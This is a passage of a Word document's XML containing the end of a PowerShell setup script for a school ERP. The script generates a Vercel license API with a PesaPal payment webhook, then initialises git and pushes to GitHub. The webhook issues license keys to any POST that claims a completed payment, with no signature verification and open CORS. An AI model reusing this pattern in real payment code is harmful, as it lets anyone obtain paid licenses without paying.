        <w:t>New-Item -ItemType Directory -Path (Join-Path $apiDir "api") -Force | Out-Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D9DBF9A1">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Set-Content -Path (Join-Path $apiDir "package.json") -Value '{"name":"vercel-license-api","version":"1.0.0","private":true,"dependencies":{"@supabase/supabase-js":"^2.33.1","axios":"^1.5.0","nodemailer":"^6.9.5"}}' -Encoding UTF8 -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAE08BF">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Set-Content -Path (Join-Path $apiDir "vercel.json") -Value '{"version":2,"functions":{"api/*.js":{"memory":256,"maxDuration":10}}}' -Encoding UTF8 -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52082CCF">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Set-Content -Path (Join-Path $apiDir "index.html") -Value '&lt;!DOCTYPE html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;Ssewasswa ERP&lt;/title&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Ssewasswa School ERP&lt;/h1&gt;&lt;/body&gt;&lt;/html&gt;' -Encoding UTF8 -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7F39A4">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Set-Content -Path (Join-Path $apiDir "api\parent-portal.js") -Value 'module.exports = (req, res) =&gt; res.status(200).json({ status: "success" });' -Encoding UTF8 -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="9ECD0990">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $webhookContent = @'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="ACF9F8C7">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>const { createClient } = require('@supabase/supabase-js');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BC7ED0">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>const crypto = require('crypto');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="A9B3F266">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>const supabase = createClient(process.env.SUPABASE_URL, process.env.SUPABASE_KEY);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="CEA8DAB0">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>module.exports = async (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E727100">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  res.setHeader('Access-Control-Allow-Origin', '*');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E47FB0F2">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  if (req.method !== 'POST') return res.status(405).json({ error: 'Method Not Allowed' });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="9B8360F0">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  const n = req.body;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3228A3FA">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  if (n.status === 'COMPLETED') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D2BC3C1E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    const hwid = n.merchant_reference || n.hwid || 'UNKNOWN_HWID';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FBB28E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    const userEmail = n.email || n.customer_email;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="8D349000">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    const tier = (n.amount || 0) &gt;= 300000 ? 'PREM' : 'ORD';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F51B34E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if (hwid === 'UNKNOWN_HWID' || !userEmail) return res.status(200).json({ status: 'ignored' });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="A2DE737D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    const hwidHash = crypto.createHash('sha256').update(hwid).digest('hex').substring(0, 16);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030E53CF">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    const licenseKey = `SSEWASSWA-${tier}-${crypto.randomBytes(2).toString('hex').toUpperCase()}-${crypto.randomBytes(2).toString('hex').toUpperCase()}-${hwidHash}`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3F6EDB">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    await supabase.from('licenses').upsert([{ hwid, email: userEmail, license_key: licenseKey, tier, amount_paid: n.amount || 0 }]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417A9131">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return res.status(200).json({ status: 'success', key: licenseKey });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BDF1B8">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01652C73">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  return res.status(200).json({ status: 'pending' });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="EC0EF340">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37655451">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>'@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DF0FA2">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Set-Content -Path (Join-Path $apiDir "api\pesapal-webhook.js") -Value $webhookContent -Encoding UTF8 -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24914C47">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="C0237B80">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t># ═══ 15. GIT INIT AND PUSH ═══</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="9B6F4EE7">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Write-Host "[15/15] Initializing Git and Pushing to GitHub..." -ForegroundColor Yellow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="CAD1D2ED">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $repoUrl = "https://github.com/waiswadaniel24/ssewasswa-school-v10-isolated.git"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21795337">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="CB98B0F0">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>if (!(Get-Command git -ErrorAction SilentlyContinue)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353EDF43">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Write-Host "Git is not installed or not in PATH. Please install Git and run this script again." -ForegroundColor Red</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0260C2">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B3B2FAB5">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if (!(Test-Path (Join-Path $root ".git"))) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5649B97F">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        Write-Host "Initializing Git repository..." -ForegroundColor Gray</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFFD496">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        git init $root | Out-Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F9E5C0">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C290A9">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35A420FF">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $gitignorePath = Join-Path $root ".gitignore"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD95514">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if (!(Test-Path $gitignorePath)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="AEB15E80">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        $ignoreContent = @'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20601491">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>node_modules/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451EE1CC">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>dist/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AF7926">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>release/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="AB9A1A8B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>*.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="FEAE6521">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>.env</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="9493AAE0">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>.vercel/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D7EC4B50">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>auto-license-server/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EBF3E9">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>'@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B1AFF3B6">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        Set-Content -Path $gitignorePath -Value $ignoreContent -Encoding UTF8 -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F64F0A6">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="BA2BE168">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="FDDF86EF">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Write-Host "Staging files..." -ForegroundColor Gray</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="AEAD9719">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    git -C $root add . | Out-Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3EF6E0">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72EB221A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Write-Host "Committing changes..." -ForegroundColor Gray</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="BA39F17F">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    git -C $root commit -m "Ultimate Consolidated Upgrade &amp; Fixes" 2&gt;&amp;1 | Out-Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA1AB6F">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36334A86">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $remoteExists = git -C $root remote get-url origin 2&gt;$null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="C6B08628">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if (!$remoteExists) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E79A5608">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        Write-Host "Adding remote origin..." -ForegroundColor Gray</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50581D60">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        git -C $root remote add origin $repoUrl 2&gt;&amp;1 | Out-Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="82D1221B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    } else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E56694">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        git -C $root remote set-url origin $repoUrl 2&gt;&amp;1 | Out-Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B3C171">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BD03A7">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="C5080E2B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Write-Host "Pushing to GitHub ($repoUrl)..." -ForegroundColor Cyan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="FD74625B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Write-Host "You may be prompted to log in to GitHub. Please authenticate in the browser if prompted." -ForegroundColor Yellow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39043956">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEF1754">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $pushResult = git -C $root push -u origin master 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B06CE0F5">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if ($LASTEXITCODE -ne 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="C8C0DB7B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        $pushResult = git -C $root push -u origin main 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="BC0CED59">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="9418AE62">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="9F141AE3">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if ($LASTEXITCODE -eq 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="FFEDBF80">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        Write-Host "Successfully pushed to GitHub!" -ForegroundColor Green</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B514CA60">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    } else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E73F0225">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        Write-Host "Push failed. Error details:" -ForegroundColor Red</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0715B7EA">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        Write-Host $pushResult -ForegroundColor Gray</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="BC203819">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        Write-Host "You may need to manually push using: git push -u origin master (or main)" -ForegroundColor Yellow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B0A64568">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091DD9FA">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A12E1A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="EDAEC6C6">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t># ═══ DONE ═══</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="9C70EF70">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Write-Host ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D02443">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Write-Host "========================================" -ForegroundColor Cyan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50000F42">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Write-Host " ULTIMATE CONSOLIDATED UPGRADE COMPLETE!" -ForegroundColor Green</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EBDB99">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Write-Host "========================================" -ForegroundColor Cyan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="BA096BFA">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Write-Host ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E9CD1E7C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Write-Host "Next Steps:" -ForegroundColor Yellow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BA6FBD">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Write-Host "  1. Run 'npm run dev' to test the desktop app." -ForegroundColor White</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5622E43A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Write-Host "  2. Go to Settings -&gt; APIs tab to configure PesaPal and SMS keys." -ForegroundColor White</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="920887E7">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Write-Host "  3. Deploy 'vercel-license-api' folder to Vercel." -ForegroundColor White</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4824A4F2">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Write-Host "  4. Set environment variables on Vercel: SUPABASE_URL, SUPABASE_KEY, GMAIL_USER, GMAIL_PASS, AT_USERNAME, AT_API_KEY, WA_TOKEN, WA_PHONE_ID, PESAPAL_SECRET" -ForegroundColor White</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21208159">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Write-Host ""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6189</Words>
  <Characters>44165</Characters>
  <Application>WPS Office</Application>
  <Paragraphs>894</Paragraphs>
  <CharactersWithSpaces>52760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2026-09-16T11:02:52Z</dcterms:created>
  <dc:creator>SM-A055F</dc:creator>
  <lastModifiedBy>SM-A055F</lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-16T11:02:52Z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aeac9012ca5e4d338fd96b677bd5ab77_21</vt:lpwstr>
  </property>
</Properties>
</file>